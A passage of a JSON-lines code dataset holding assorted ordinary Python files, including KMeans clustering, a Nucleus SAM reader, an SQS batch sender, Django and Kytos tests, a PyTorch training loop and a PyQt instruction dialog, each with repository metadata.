l)\n print (\"loghdr: \", self.loghdr[i])\n else:\n print (\"Unsupported command\")\n return\n\nLogHeaderDbg()\n","sub_path":"gdb_python_modules/logheader_dbg.py","file_name":"logheader_dbg.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"213054374","text":"import numpy as np\r\nimport math\r\nfrom copy import deepcopy\r\n\r\n\r\nclass KMeans(object):\r\n\r\n def __init__(self, k=3, tolerancia=0.001, max_iterations=500):\r\n self.k = k\r\n self.tolerancia = tolerancia\r\n self.max_iterations = max_iterations \r\n\r\n def fit(self, data, n_clusters=3):\r\n self.initialize_centroids(data)\r\n for _ in range(self.max_iterations):\r\n self.otimizado = True\r\n self.initialize_classes() \r\n\r\n # Calcula a distancia entre os pontos e os clusters. 
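The four hard-coded pairings in the last solution above generalise: with k moves there are k + 1 candidate pairings of the surviving extremes. A sketch:

```python
import heapq

def min_difference(nums, k=3):
    # Keep the (k+1) largest and (k+1) smallest; removing i of the
    # largest forces removing (k - i) of the smallest.
    if len(nums) <= k + 1:
        return 0
    maxs = heapq.nlargest(k + 1, nums)   # descending
    mins = heapq.nsmallest(k + 1, nums)  # ascending
    return min(maxs[i] - mins[k - i] for i in range(k + 1))

assert min_difference([5, 3, 2, 4]) == 0
assert min_difference([1, 5, 0, 10, 14]) == 1
```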
Escolhe o centroid mais proximo\r\n for sample in data:\r\n distances = [self.Distancia_Euclidiana(sample, centroid) for centroid in self.centroids]\r\n classification = distances.index(min(distances))\r\n self.classes[classification].append(sample)\r\n \r\n self.recalcular_centroids()\r\n\r\n # Termina se estiver otimizado: se os centroids alteram pouco a posicao(menos que a tolerancia definida)\r\n if self.otimizado:\r\n break \r\n\r\n \r\n def initialize_centroids(self, data):\r\n self.centroids = []\r\n # Os primeiros 'k' elementos do dataset serão os centroids iniciais\r\n for i in range(self.k):\r\n self.centroids.append(data[i])\r\n \r\n def initialize_classes(self):\r\n self.classes = {}\r\n for i in range(self.k):\r\n self.classes[i] = []\r\n\r\n def recalcular_centroids(self):\r\n anterior = deepcopy(self.centroids)\r\n # Recalcula os centroids com base na média dos pontos do cluster\r\n for classification in self.classes:\r\n self.centroids[classification] = np.average(self.classes[classification], axis = 0)\r\n\r\n for i in range(len(self.centroids)):\r\n centroid_original = anterior[i]\r\n centroid_atual = self.centroids[i]\r\n \r\n if np.sum(np.abs((centroid_atual - centroid_original)/centroid_original) * 100.0) > self.tolerancia:\r\n self.otimizado = False\r\n\r\n def Distancia_Euclidiana(self, matriz_A, matriz_B):\r\n distancia = 0\r\n for i in range(len(matriz_A)):\r\n distancia += (matriz_A[i] - matriz_B[i]) ** 2\r\n \r\n ed = math.sqrt(distancia)\r\n return ed \r\n","sub_path":"MachineLearning/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"93467658","text":"import numpy as np\nimport pandas as pd\nimport itertools as it\n\nfrom . 
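The Distancia_Euclidiana loop in the KMeans above can be vectorised so each sample is compared against every centroid in a single call — a sketch with numpy:

```python
import numpy as np

def nearest_centroid(sample, centroids):
    # One norm call computes the distance to all centroids at once,
    # replacing the per-coordinate accumulation loop.
    dists = np.linalg.norm(np.asarray(centroids) - np.asarray(sample), axis=1)
    return int(dists.argmin())

centroids = [[0.0, 0.0], [10.0, 10.0]]
print(nearest_centroid([1.0, 2.0], centroids))  # 0
print(nearest_centroid([9.0, 8.5], centroids))  # 1
```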
import transform_3d as t3d\n\nclass PathModelBase(object):\n def __init__(self, path_df):\n self._path_df = path_df\n self._time_s = None\n def get_heading_at_samples(self):\n raise NotImplementedError()\n def get_location_at_samples(self):\n raise NotImplementedError()\n def set_time_samples(self, time_s):\n self._time_s = time_s\n\nclass DumbHeuristicPathModel(PathModelBase):\n \"\"\"\n This model makes a couple of extremely brittle assumptions:\n 1) The car travels in a straight line in all dimensions.\n 2) Only the ordering of the time samples matters; absolute time does not.\n 3) GPS packets and LIDAR packets are sampled at the same times.\n \"\"\"\n\n def __init__(self, *args, **dargs):\n super(DumbHeuristicPathModel, self).__init__(*args, **dargs)\n self._path_df = self._path_df.sort('t')\n self._norms = self._path_df[['x', 'y', 'z']].diff().fillna(0).apply(np.linalg.norm, axis=1)\n\n def set_time_samples(self, time_s):\n super(DumbHeuristicPathModel, self).set_time_samples(time_s)\n t_min = min(self._path_df['t'].min(), self._time_s.min())\n self._path_df['t_norm'] = self._path_df['t']-t_min\n self._time_s = self._time_s-t_min\n\n def get_location_at_samples(self):\n dy = -self._norms.cumsum()[:-1]\n locs = pd.DataFrame({'x': 0.0, 'y': dy, 'z': 0.0})\n grouper = pd.cut(self._time_s,\n bins=self._path_df['t_norm'],\n labels=xrange(len(dy)),\n )\n return locs, grouper\n\n def get_heading_at_samples(self):\n N = len(self._time_s)\n vec = pd.DataFrame({'x': 0.0, 'y': 1.0, 'z': 0.0}, index=[0])\n grouper = np.zeros(N, dtype=int)\n return vec, grouper\n\n\nclass ZipperPathModel(DumbHeuristicPathModel):\n\n def __init__(self, *args, **dargs):\n super(DumbHeuristicPathModel, self).__init__(*args, **dargs)\n self._path_df = self._path_df.sort('t')\n self._norms = self._path_df[['x', 'y']].diff().fillna(0).apply(np.linalg.norm, axis=1)\n\n def get_location_at_samples(self):\n dy = -self._norms.cumsum()[:-1]\n locs = pd.DataFrame({'x': 0.0, 'y': dy, 'z': 0.0})\n counter = it.count(-1)\n time_df = pd.DataFrame({'t': self._time_s}).sort('t')\n _helper = lambda _df: pd.Series({'group': counter.next()})\n _grouper = time_df.groupby('t').apply(_helper)\n result = time_df.join(_grouper, on='t')\n return locs, result['group']\n\n\nclass Registrar(object):\n _required_fields = ['x', 'y', 'z', 't']\n \n def __init__(self, lidar_df, gps_df, lidar_axis=None, pathcls=None):\n assert all([_f in lidar_df.columns for _f in self._required_fields]), \"Required fields missing!\"\n assert all([_f in gps_df.columns for _f in self._required_fields]), \"Required fields missing!\"\n self._lidar_df = lidar_df\n self._gps_df = gps_df\n if lidar_axis is None:\n self._lidar_axis = np.array([0.0, 1.0, 0.0])\n if pathcls is None:\n self._PathModelCls = DumbHeuristicPathModel\n \n def compute(self):\n _t_s = self._lidar_df['t']\n path_model = self.build_path_model()\n path_model.set_time_samples(_t_s)\n self._result = self._lidar_df[['x', 'y', 'z']]\n self._do_translations(path_model) # have to translate before we rotate; no communitivity here\n self._do_rotations(path_model)\n \n def _do_translations(self, path_model):\n vecs, grouper = path_model.get_location_at_samples()\n transforms = vecs.apply(t3d.Translation.from_vector, axis=1)\n self._result = self._apply_many_transforms(self._result, transforms, grouper)\n\n def _do_rotations(self, path_model):\n vecs, grouper = path_model.get_heading_at_samples()\n _helper = lambda _df: t3d.Rotation.from_two_vectors(_df, self._lidar_axis)\n transforms = vecs.apply(_helper, 
axis=1)\n self._result = self._apply_many_transforms(self._result, transforms, grouper)\n \n def _apply_many_transforms(self, xyz_df, transforms, grouper):\n _helper = lambda _df: self._apply_transform(_df, transforms[_df.name])\n result = xyz_df.groupby(grouper).apply(_helper)\n result.reset_index(inplace=True)\n return result[['x', 'y', 'z']]\n\n def _apply_transform(self, xyz_df, transform):\n result = transform(xyz_df.T).T\n return pd.DataFrame({'x': result[:, 0], 'y': result[:, 1], 'z': result[:, 2]})\n \n def build_path_model(self):\n return self._PathModelCls(self._gps_df)\n\n def get_result(self):\n return self._result\n","sub_path":"cloudlab/pcd_reg.py","file_name":"pcd_reg.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"365221819","text":"# -*- coding: utf-8 -*-\n\n# cbz から表紙のサムネイル画像を生成する\n# -resize 200x200 オプションで画像を生成する\n\nimport configparser\nimport io\nimport os\nimport os.path\nimport subprocess\nimport sys\n\nclass CommandExecutor():\n def __init__(self):\n self.COMMAND = 'magick \"{0}\" -alpha off \"{1}\"'\n\n def execute(self, src, dst):\n command = self.COMMAND.format(src, dst)\n print(command)\n subprocess.call(command, shell=True)\n\ndef create_image(src_path, dst_path):\n executor = CommandExecutor()\n executor.execute(src_path, dst_path)\n\ndef extract_alpha():\n src = 'yamato'\n \n folders = os.listdir(src)\n for file_name in folders:\n file_path = os.path.join(src, file_name)\n dst = os.path.splitext(os.path.basename(file_name))[0] + \".png\"\n create_image(file_path, dst)\n\n print(\"finish.\")\n\nif __name__ == '__main__':\n extract_alpha()\n","sub_path":"python3/extract_alpha.py","file_name":"extract_alpha.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443608928","text":"class Children:\n _name = \"\"\n _surname = \"\"\n _age = 0\n def __init__(self,name,surname,age):\n self._name = name\n self._surname = surname\n self._age = age\n def getData(self):\n print(\"name: \",self._name)\n print(\"surname: \",self._surname)\n print(\"age: \",self._age)\none = Children(\"OneName\",\"OneSurname\",12)\none.getData()\ntwo = Children(\"TwoName\",\"TwoSurname\",10)\ntwo.getData()","sub_path":"23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"353773311","text":"# Copyright 2018 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Classes for reading and writing SAM and BAM files.\n\nAPI for reading:\n with SamReader(input_path) as reader:\n for read in reader:\n process(reader.header, read)\n\nAPI for writing:\n\n with SamWriter(output_path) as writer:\n for read in reads:\n writer.write(read)\n\nwhere read is a nucleus.genomics.v1.Read protocol buffer.\n\nIf the path contains '.tfrecord', a TFRecord file is assumed; otherwise\nit is treated 
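The Children class above uses shared class-level attributes as pseudo-fields; a dataclass expresses the same record more idiomatically and generates __init__ and a readable __repr__ for free:

```python
from dataclasses import dataclass

@dataclass
class Children:
    name: str
    surname: str
    age: int

one = Children("OneName", "OneSurname", 12)
print(one)  # Children(name='OneName', surname='OneSurname', age=12)
```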
as a true SAM file. Also, file names ending with '.gz'\nare assumed to be compressed.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\n\nfrom nucleus.io import genomics_reader\nfrom nucleus.io import genomics_writer\nfrom nucleus.io.python import sam_reader\nfrom nucleus.protos import index_pb2\nfrom nucleus.protos import reads_pb2\n\n\nclass NativeSamReader(genomics_reader.GenomicsReader):\n \"\"\"Class for reading from native SAM files.\n\n Most users will want to use SamReader instead, because it dynamically\n dispatches between reading native SAM files and TFRecord files based\n on the filename's extensions.\n \"\"\"\n\n def __init__(self, input_path,\n use_index=True,\n read_requirements=None,\n parse_aux_fields=False,\n hts_block_size=None,\n downsample_fraction=None,\n random_seed=None):\n \"\"\"Initializes a NativeSamReader.\n\n Args:\n input_path: string. A path to a resource containing SAM/BAM records.\n Currently supports SAM text format and BAM binary format.\n use_index: optional bool, defaulting to True. If True, we will attempt to\n load an index file for reads_source to enable the query() API call. If\n True an index file must exist. If False, we will not attempt to load an\n index for reads_source, disabling the query() call.\n read_requirements: optional ReadRequirement proto. If not None, this proto\n is used to control which reads are filtered out by the reader before\n they are passed to the client.\n parse_aux_fields: optional bool. If False, the default, we will not parse\n the auxillary fields of the SAM/BAM records (see SAM spec for details).\n Parsing the aux fields is often unnecessary for many applications, and\n adds a significant parsing cost to access. If you need these aux fields,\n set parse_aux_fields to True and these fields will be parsed and\n populate the appropriate Read proto fields (e.g., read.info).\n hts_block_size: integer or None. If None, will use the default htslib\n block size. Otherwise, will configure the underlying block size of the\n underlying htslib file object. Larger values (e.g. 1M) may be\n beneficial for reading remote files.\n downsample_fraction: None or float in the interval [0.0, 1.0]. If not\n None or 0.0, the reader will only keep each read with probability\n downsample_fraction, randomly.\n random_seed: None or int. The random seed to use with this sam reader, if\n needed. 
If None, a fixed random value will be assigned.\n\n Raises:\n ValueError: If downsample_fraction is not None and not in the interval\n (0.0, 1.0].\n ImportError: If someone tries to load a tfbam file.\n \"\"\"\n if input_path.endswith('.tfbam'):\n # Delayed loading of tfbam_lib.\n try:\n from tfbam_lib import tfbam_reader # pylint: disable=g-import-not-at-top\n self._reader = tfbam_reader.make_sam_reader(\n input_path,\n read_requirements=read_requirements,\n use_index=use_index,\n unused_block_size=hts_block_size,\n downsample_fraction=downsample_fraction,\n random_seed=random_seed)\n except ImportError:\n raise ImportError(\n 'tfbam_lib module not found, cannot read .tfbam files.')\n else:\n index_mode = index_pb2.INDEX_BASED_ON_FILENAME\n if not use_index:\n index_mode = index_pb2.DONT_USE_INDEX\n\n aux_field_handling = reads_pb2.SamReaderOptions.SKIP_AUX_FIELDS\n if parse_aux_fields:\n aux_field_handling = reads_pb2.SamReaderOptions.PARSE_ALL_AUX_FIELDS\n\n if downsample_fraction:\n if not 0.0 < downsample_fraction <= 1.0:\n raise ValueError(\n 'downsample_fraction must be in the interval (0.0, 1.0]',\n downsample_fraction)\n\n if random_seed is None:\n # Fixed random seed produced with 'od -vAn -N4 -tu4 < /dev/urandom'.\n random_seed = 2928130004\n\n self._reader = sam_reader.SamReader.from_file(\n input_path.encode('utf8'),\n reads_pb2.SamReaderOptions(\n read_requirements=read_requirements,\n index_mode=index_mode,\n aux_field_handling=aux_field_handling,\n hts_block_size=(hts_block_size or 0),\n downsample_fraction=downsample_fraction,\n random_seed=random_seed))\n\n self.header = self._reader.header\n\n super(NativeSamReader, self).__init__()\n\n def iterate(self):\n return self._reader.iterate()\n\n def query(self, region):\n return self._reader.query(region)\n\n def __exit__(self, exit_type, exit_value, exit_traceback):\n self._reader.__exit__(exit_type, exit_value, exit_traceback)\n\n\nclass SamReader(genomics_reader.DispatchingGenomicsReader):\n \"\"\"Class for reading Read protos from SAM or TFRecord files.\"\"\"\n\n def _native_reader(self, input_path, **kwargs):\n return NativeSamReader(input_path, **kwargs)\n\n def _record_proto(self):\n return reads_pb2.Read\n\n\nclass NativeSamWriter(genomics_writer.GenomicsWriter):\n \"\"\"Class for writing to native SAM files.\n\n Most users will want SamWriter, which will write to either native SAM\n files or TFRecords files, based on the output filename's extensions.\n \"\"\"\n\n def __init__(self, output_path, header):\n \"\"\"Initializer for NativeSamWriter.\n\n Args:\n output_path: str. A path where we'll write our SAM/BAM file.\n header: A nucleus.SamHeader protobuf. 
The header is used both\n for writing the header, and to control the sorting applied to\n the rest of the file.\n \"\"\"\n raise NotImplementedError\n\n def write(self, proto):\n raise NotImplementedError\n\n def __exit__(self, exit_type, exit_value, exit_traceback):\n self._writer.__exit__(exit_type, exit_value, exit_traceback)\n\n\nclass SamWriter(genomics_writer.DispatchingGenomicsWriter):\n \"\"\"Class for writing Variant protos to SAM or TFRecord files.\"\"\"\n\n def _native_writer(self, output_path, header):\n return NativeSamWriter(output_path, header)\n","sub_path":"nucleus/io/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163119515","text":"import boto3\nfrom botocore.exceptions import ClientError\n\nfrom handofcats import as_command\n\n\n@as_command\ndef run(*, queue_url: str):\n \"\"\"Exercise send_sqs_message()\"\"\"\n\n # Assign this value before running the program\n sqs_client = boto3.client(\"sqs\")\n\n # Send some SQS messages\n entries = []\n for i in range(1, 6):\n entries.append(\n {\"Id\": f\"m{i}\", \"MessageBody\": f\"SQS message #{i}\", \"DelaySeconds\": 10}\n )\n\n try:\n assert (\n entries\n ), \"!! An error occurred (AWS.SimpleQueueService.EmptyBatchRequest) when calling the SendMessageBatch operation: There should be at least one SendMessageBatchRequestEntry in the request.\"\n\n response = sqs_client.send_message_batch(QueueUrl=queue_url, Entries=entries)\n print(response)\n except ClientError as e:\n print(\"!!\", e)\n","sub_path":"daily/20200129/example_sqs/00sqs-batch-send.py","file_name":"00sqs-batch-send.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"554742936","text":"from django.test import TestCase\nfrom unittest.mock import patch\nfrom django.db.utils import OperationalError\nfrom django.core.management import call_command\n\nclass CommandTests(TestCase):\n def test_wait_for_db_read(self):\n '''\n Test waiting for db is available\n '''\n with patch('django.db.utils.ConnectionHandler.__getitem__') as gi:\n # In place of performing the action that above command run, we directly return True for it.\n gi.return_value = True\n call_command('wait_for_db')\n self.assertEqual(gi.call_count, 1)\n\n @patch('time.sleep', return_value=True)\n def test_wait_for_db(self, ts):\n '''\n Test waiting for db\n '''\n with patch('django.db.utils.ConnectionHandler.__getitem__') as gi:\n gi.side_effect = [OperationalError] * 5 + [True]\n call_command('wait_for_db')\n self.assertEqual(gi.call_count, 6)\n","sub_path":"core/tests/tests_commands.py","file_name":"tests_commands.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"326371654","text":"# expr_runner_ide.py\n#\n# experiment launcher for value iteration used in IDE\n# -----------------------\n\nfrom experiment_creater_and_resumer.experiment_creater_and_resumer import ExprCreaterAndResumer\nimport gridworldValueIteration\n\n\ndef run_expr():\n # agent parameters\n alpha = 0.2 # learning rate\n epsilon = 0.3 # exploration rate\n\n # learning environment parameters\n display_speed = 0.5\n discount = 0.9\n delta = 0.02\n\n # generate postfix\n postfix = ''\n postfix += '_valueIteration'\n postfix += '_alpha' + str(alpha)\n postfix += '_epsilon' + str(epsilon)\n postfix += '_speed' + 
str(display_speed)\n\n log_dir = '/Users/lguan/Documents/Study/Research/Summer 2018/experiment-logs'\n expr_saver = ExprCreaterAndResumer(rootdir=log_dir, postfix=postfix)\n\n # save experiment runner\n expr_saver.dump_src_code_and_model_def(fname=__file__)\n # save grid world related files\n expr_saver.dump_src_code_and_model_def(fname=gridworldValueIteration.__file__)\n\n # run experiment\n exprValueIteration = gridworldValueIteration.GridworldValueIterationExperiment(learning_rate=alpha, epsilon=epsilon\n , discount=discount, delta=delta\n , display_speed=display_speed)\n exprValueIteration.start()\n\n\nif __name__ == '__main__':\n run_expr()\n","sub_path":"experiment-logs/TAMER-robust-experiment/42_preferenceTAMERAgent_alpha0.3_epsilon0.05_policyConverge_autoFeedback_no0_wrong0_noise0.1_speed2.0/all_py_files_snapshot/experiment/expr_value_iteration_launcher_ide.py","file_name":"expr_value_iteration_launcher_ide.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"481854570","text":"\"\"\"Test v0x01.utils methods.\"\"\"\nfrom unittest import TestCase\nfrom unittest.mock import MagicMock, patch, PropertyMock\n\nfrom kytos.lib.helpers import get_switch_mock, get_connection_mock\nfrom napps.kytos.of_core.v0x01.utils import (send_desc_request, send_echo,\n say_hello, send_set_config,\n handle_features_reply)\n\nfrom tests.helpers import get_controller_mock\n\n\nclass TestUtils(TestCase):\n \"\"\"Test utils.\"\"\"\n\n def setUp(self):\n \"\"\"Execute steps before each tests.\"\"\"\n self.mock_controller = get_controller_mock()\n self.mock_switch = get_switch_mock('00:00:00:00:00:00:00:01', 0x01)\n self.mock_connection = get_connection_mock(0x01, self.mock_switch)\n\n @patch('napps.kytos.of_core.v0x01.utils.emit_message_out')\n def test_send_desc_request(self, mock_emit_message_out):\n \"\"\"Test send_desc_request.\"\"\"\n send_desc_request(self.mock_controller, self.mock_switch)\n mock_emit_message_out.assert_called()\n\n def test_handle_features_reply(self):\n \"\"\"test Handle features reply.\"\"\"\n mock_event = MagicMock()\n mock_features = MagicMock()\n mock_controller = MagicMock()\n self.mock_switch.get_interface_by_port_no.side_effect = [MagicMock(),\n False]\n type(mock_features).ports = PropertyMock(return_value=[MagicMock()])\n type(mock_event).content = PropertyMock(return_value={'message':\n mock_features})\n mock_controller.get_switch_or_create.return_value = self.mock_switch\n response = handle_features_reply(mock_controller, mock_event)\n self.assertEqual(self.mock_switch, response)\n self.assertEqual(self.mock_switch.update_features.call_count, 1)\n\n self.mock_switch.update_features.call_count = 0\n response = handle_features_reply(mock_controller, mock_event)\n self.assertEqual(self.mock_switch, response)\n self.assertEqual(self.mock_switch.update_features.call_count, 1)\n\n @patch('napps.kytos.of_core.v0x01.utils.emit_message_out')\n def test_send_echo(self, mock_emit_message_out):\n \"\"\"Test send_echo.\"\"\"\n send_echo(self.mock_controller, self.mock_switch)\n mock_emit_message_out.assert_called()\n\n @patch('napps.kytos.of_core.v0x01.utils.emit_message_out')\n def test_set_config(self, mock_emit_message_out):\n \"\"\"Test set_config.\"\"\"\n send_set_config(self.mock_controller, self.mock_switch)\n mock_emit_message_out.assert_called()\n\n @patch('napps.kytos.of_core.v0x01.utils.emit_message_out')\n def test_say_hello(self, mock_emit_message_out):\n \"\"\"Test 
say_hello.\"\"\"\n say_hello(self.mock_controller, self.mock_switch)\n mock_emit_message_out.assert_called()\n","sub_path":"tests/unit/v0x01/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"49711339","text":"import torch\n\nfrom tqdm import tqdm\nfrom utils.utils import cross_entropy_3d, dice\n\n\ndef train(model, loader, optimizer, logger, args, epoch, print_freq = 10):\n\tlosses = []\n\tdices = []\n\tmodel.train()\n\tfor i, batch in enumerate(loader):\n\t\tindex = batch['index']\n\t\tvolume = batch['image'].cuda()\n\t\tvolume = volume.view((-1,) + volume.shape[2:])\n\t\tlabel = batch['label'].cuda()\n\t\tlabel = label.view((-1,) + label.shape[2:])\n\t\toutput, _ = model(volume)\n\t\tloss = cross_entropy_3d(output, label)\n\n\t\toptimizer.zero_grad()\n\t\tloss.backward()\n\t\toptimizer.step()\n\n\t\tpred = output.argmax(dim = 1)\n\t\tlabel = label.squeeze(1)\n\t\td = dice(pred.cpu().data.numpy() == 1, label.cpu().data.numpy() == 1)\n\t\tdices.append(d)\n\t\tlosses.append(loss)\n\t\tlosses.append(loss.detach().cpu().item())\n\t\tif i % print_freq == 0:\n\t\t\ttqdm.write('[Epoch {}, {}/{}] loss: {}, dice: {}'.format(epoch, i, len(loader), loss.detach().cpu().item(), d))\n\n\t\t\tlogger.log(\"train/loss\", loss)\n\t\t\tlogger.log(\"train/dice\", d)\n\t\t\tlogger.step()\n\ttqdm.write(\"[Epoch {}] avg loss: {}, avg dice: {}\".format(epoch, sum(losses) / len(losses), sum(dices) / len(dices)))\n\n\tmodel.eval()\n\tdices = []\n\n\ndef validate(model, loader, optimizer, logger, saver, args, epoch):\n\tdices = []\n\tfor i, batch in enumerate(loader):\n\t\tindex = batch['index']\n\t\tvolume = batch['image'].cuda()\n\t\tvolume = volume.view((-1,) + volume.shape[2:])\n\t\tlabel = batch['label'].cuda()\n\t\tlabel = label.view((-1,) + label.shape[2:])\n\t\tlabel = label.squeeze(1)\n\t\toutput, _ = model(volume)\n\t\tpred = output.argmax(dim = 1)\n\t\td = dice(pred.cpu().data.numpy() == 1, label.cpu().data.numpy() == 1)\n\t\tdices.append(d)\n\t\tif args.local_rank == 0:\n\t\t\tlogger.log(\"test/dice\", d)\n\t\t\tsaver.save(epoch, {\n\t\t\t\t\t'state_dict': model.state_dict(),\n\t\t\t\t\t'dice': d,\n\t\t\t\t\t'optimizer_state_dict': optimizer.state_dict()\n\t\t\t\t}, d)\n\ttqdm.write(\"[Epoch {}] test avg dice: {}\".format(epoch, sum(dices) / len(dices)))\n","sub_path":"uda/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249028615","text":"promedio = float(input(\"ingrese su promedio \"))\nmodalidad = \"pregrado\"\ncreditos = 0\ndescuento = 0\npodraMatricular = 1\n\n\nif modalidad == \"pregrado\":\n if promedio >= 4.5:\n creditos = 28\n descuento = 0.25\n elif promedio < 4.5 and promedio >= 4:\n creditos = 25\n descuento = 0.1\n elif promedio < 4 and promedio >= 3.5:\n creditos = 20\n descuento = 0\n elif promedio < 3.5 and promedio >= 2.5:\n creditos = 15\n descuento = 0\n elif promedio < 2.5:\n print(\"no podra matricularse\")\n podraMatricular = 0\nelse:\n if promedio >= 4.5:\n creditos = 20\n descuento = 0.2\n elif promedio < 4.5 and promedio >= 0:\n creditos = 10\n descuento = 0\n \nif podraMatricular == 1:\n if modalidad == \"pregrado\":\n print(\"creditos: \" + str(creditos) + \" total a pagar: \" + str(creditos* 50000))\n print(\"descuento: \" + str((creditos*50000)*descuento) + \" total con adescuento: \" + 
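utils.dice in the training loop above is assumed to compute the usual Dice overlap between binary masks; a stand-alone sketch of that metric:

```python
import numpy as np

def dice(pred, target, eps=1e-7):
    # Dice = 2*|A ∩ B| / (|A| + |B|); eps avoids 0/0 on empty masks.
    pred = pred.astype(bool)
    target = target.astype(bool)
    inter = np.logical_and(pred, target).sum()
    return (2.0 * inter + eps) / (pred.sum() + target.sum() + eps)

a = np.array([1, 1, 0, 0])
b = np.array([1, 0, 0, 0])
print(dice(a == 1, b == 1))  # 2*1 / (2+1) ≈ 0.667
```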
str((creditos*50000)*(1-descuento)))\n if modalidad == \"posgrado\":\n print(\"creditos: \" + str(creditos) + \" total a pagar: \" + str(creditos* 300000))\n print(\"descuento: \" + str((creditos*300000)*descuento) + \" total con descuento: \" + str((creditos*300000)*(1-descuento)))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"634348072","text":"import os\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\n\nclass MyEventHandler(FileSystemEventHandler):\n def __init__(self, filepath, callback):\n self.filepath = filepath\n self.callback = callback\n\n def on_any_event(self, event):\n if event.src_path == self.filepath:\n self.callback(filepath=self.filepath)\n\n\ndef filepath(filepath, callback):\n event_handler = MyEventHandler(filepath, callback)\n dirpath = os.path.dirname(filepath)\n observer = Observer()\n observer.schedule(event_handler, dirpath, recursive=True)\n observer.start()\n\n return observer\n","sub_path":"k8s-simple-rolling-update/v2/k8sru/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"630844753","text":"'''\n Solution loops through each element in the nums array and appends the element to all existing subsets and appends the new subset to our subset array.\n \n Time Complexity: O(2^n) where n is the number of elements in the array.\n'''\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n subset = [[]]\n for i in range(len(nums)):\n for j in range(len(subset)):\n currentSubset = subset[j].copy()\n currentSubset.append(nums[i])\n subset.append(currentSubset)\n\n return subset\n","sub_path":"Subsets/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"406915152","text":"from PyQt5 import QtCore\nfrom PyQt5.QtWidgets import *\n\n\nclass WriteInstructionDialog(QDialog):\n def __init__(self, parent=None, input_content='', arch='', mode=''):\n super(WriteInstructionDialog, self).__init__(parent)\n\n layout = QVBoxLayout(self)\n layout.addWidget(QLabel('insert instruction'))\n self.input_widget = QLineEdit(self)\n if len(input_content) > 0:\n self.input_widget.setText(input_content)\n self.input_widget.setMinimumWidth(350)\n layout.addWidget(self.input_widget)\n\n arch_mode_layout = QHBoxLayout()\n import keystone\n ks_objs = dir(keystone.keystone_const)\n\n self.arch = QComboBox(self)\n for w in ks_objs:\n if w.startswith('KS_ARCH_'):\n self.arch.addItem(w.replace('KS_ARCH_', '').lower())\n if w == arch:\n self.arch.setCurrentIndex(self.arch.count() - 1)\n arch_mode_layout.addWidget(self.arch)\n\n self.mode = QComboBox(self)\n for w in ks_objs:\n if w.startswith('KS_MODE_'):\n self.mode.addItem(w.replace('KS_MODE_', '').lower())\n if w == mode:\n self.mode.setCurrentIndex(self.mode.count() - 1)\n arch_mode_layout.addWidget(self.mode)\n\n layout.addLayout(arch_mode_layout)\n\n buttons = QHBoxLayout()\n ok = QPushButton('Ok')\n buttons.addWidget(ok)\n ok.clicked.connect(self.accept)\n cancel = QPushButton('cancel')\n cancel.clicked.connect(self.close)\n buttons.addWidget(cancel)\n layout.addLayout(buttons)\n\n def keyPressEvent(self, event):\n super(WriteInstructionDialog, self).keyPressEvent(event)\n if event.key() == 
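The copy-and-extend loop in the subsets solution above enumerates the power set; itertools builds the same thing declaratively, one combinations() call per subset size:

```python
from itertools import chain, combinations

def subsets(nums):
    # r = 0..len(nums) enumerates every subset size exactly once.
    return [list(c) for c in
            chain.from_iterable(combinations(nums, r)
                                for r in range(len(nums) + 1))]

print(subsets([1, 2, 3]))
# [[], [1], [2], [3], [1, 2], [1, 3], [2, 3], [1, 2, 3]]
```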
